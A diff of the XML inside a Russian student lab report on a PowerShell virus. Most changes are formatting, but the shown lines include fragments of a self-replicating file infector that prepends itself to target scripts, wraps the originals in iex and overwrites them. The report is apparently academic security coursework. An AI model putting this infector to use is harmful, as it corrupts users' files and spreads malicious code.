--- a/sourse/Другой стек/Вирус, пакетный генератор, разведка/2_пасоиб_черникова.docx
+++ b/sourse/Другой стек/Вирус, пакетный генератор, разведка/2_пасоиб_черникова.docx
@@ -467,7 +467,7 @@
         <w:rPr>
           <w:rFonts w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>. 5131001/20502</w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -612,7 +612,7 @@
         <w:rPr>
           <w:rFonts w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>доцент</w:t>
+        <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -624,37 +624,7 @@
         <w:rPr>
           <w:rFonts w:cs="Times New Roman"/>
         </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-        </w:rPr>
         <w:t xml:space="preserve">       </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Семенов П</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> О</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -970,12 +940,14 @@
       <w:r>
         <w:t xml:space="preserve">Мой вариант включает исследование </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ps</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">1 </w:t>
       </w:r>
@@ -1063,27 +1035,14 @@
       <w:r>
         <w:t xml:space="preserve">Рисунок </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Рисунок \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - Блок-схема вируса</w:t>
       </w:r>
@@ -5237,27 +5196,14 @@
       <w:r>
         <w:t xml:space="preserve">Рисунок </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Рисунок \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -5337,27 +5283,14 @@
       <w:r>
         <w:t xml:space="preserve">Рисунок </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Рисунок \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -6405,27 +6338,14 @@
       <w:r>
         <w:t xml:space="preserve">Рисунок </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Рисунок \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -6691,8 +6611,17 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>$CURRENT_SCRIPT_PATH = $PSCommandPath</w:t>
-      </w:r>
+        <w:t>$CURRENT_SCRIPT_PATH = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>PSCommandPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6750,7 +6679,39 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>function Test-FileInfected($FilePath) {</w:t>
+        <w:t>function Test-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>FileInfected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>FilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6782,7 +6743,23 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        $content = Get-Content $FilePath -Raw</w:t>
+        <w:t xml:space="preserve">        $content = Get-Content $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>FilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Raw</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6968,13 +6945,59 @@
           <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>function Infect-File($TargetFilePath) {</w:t>
+        <w:t>function</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>Infect</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>-File($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>TargetFilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7016,7 +7039,55 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>if ($TargetFilePath -eq $CURRENT_SCRIPT_PATH -or (Test-FileInfected $TargetFilePath)) {</w:t>
+        <w:t>if ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>TargetFilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -eq $CURRENT_SCRIPT_PATH -or (Test-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>FileInfected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>TargetFilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7025,7 +7096,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7039,7 +7109,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
         <w:t>return $false</w:t>
       </w:r>
@@ -7050,14 +7119,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
@@ -7068,14 +7135,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
@@ -7086,14 +7151,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">    try {</w:t>
       </w:r>
@@ -7111,7 +7174,39 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        $targetContent = Get-Content $TargetFilePath -Raw</w:t>
+        <w:t xml:space="preserve">        $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>targetContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Get-Content $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>TargetFilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Raw</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7212,7 +7307,23 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        $virusContent = Get-Content $CURRENT_SCRIPT_PATH -Raw</w:t>
+        <w:t xml:space="preserve">        $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>virusContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Get-Content $CURRENT_SCRIPT_PATH -Raw</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7221,7 +7332,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7238,16 +7348,46 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        $virusParts = $virusContent -split "`n#=="</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>virusParts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>virusContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -split "`n#=="</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7256,14 +7396,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -7280,7 +7418,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -7289,7 +7426,23 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">$infectedContent = $INFECTION_MARKER + "`n" + </w:t>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>infectedContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $INFECTION_MARKER + "`n" + </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7305,7 +7458,32 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">                          $virusParts[0] + "`n" + </w:t>
+        <w:t xml:space="preserve">                          $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>virusParts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0] + "`n" + </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7337,7 +7515,32 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">                          'try{iex @"' + "`n" + </w:t>
+        <w:t xml:space="preserve">                          '</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>try{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>iex</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> @"' + "`n" + </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7346,7 +7549,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7360,9 +7562,24 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">$targetContent + "`n" + </w:t>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>targetContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + "`n" + </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7371,16 +7588,30 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                          '"@}catch{}'</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                          '"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>@}catch</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>{}'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7389,14 +7620,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -7414,7 +7643,39 @@
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        Set-Content $TargetFilePath $infectedContent -Force</w:t>
+        <w:t xml:space="preserve">        Set-Content $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>TargetFilePath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>infectedContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Force</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7439,7 +7700,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7453,7 +7713,6 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
@@ -7464,14 +7723,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">    catch {</w:t>
       </w:r>
@@ -7482,14 +7739,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">        return $false</w:t>
       </w:r>
@@ -7500,14 +7755,12 @@
         <w:rPr>
           <w:rFonts w:cs="Courier New"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Courier New"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
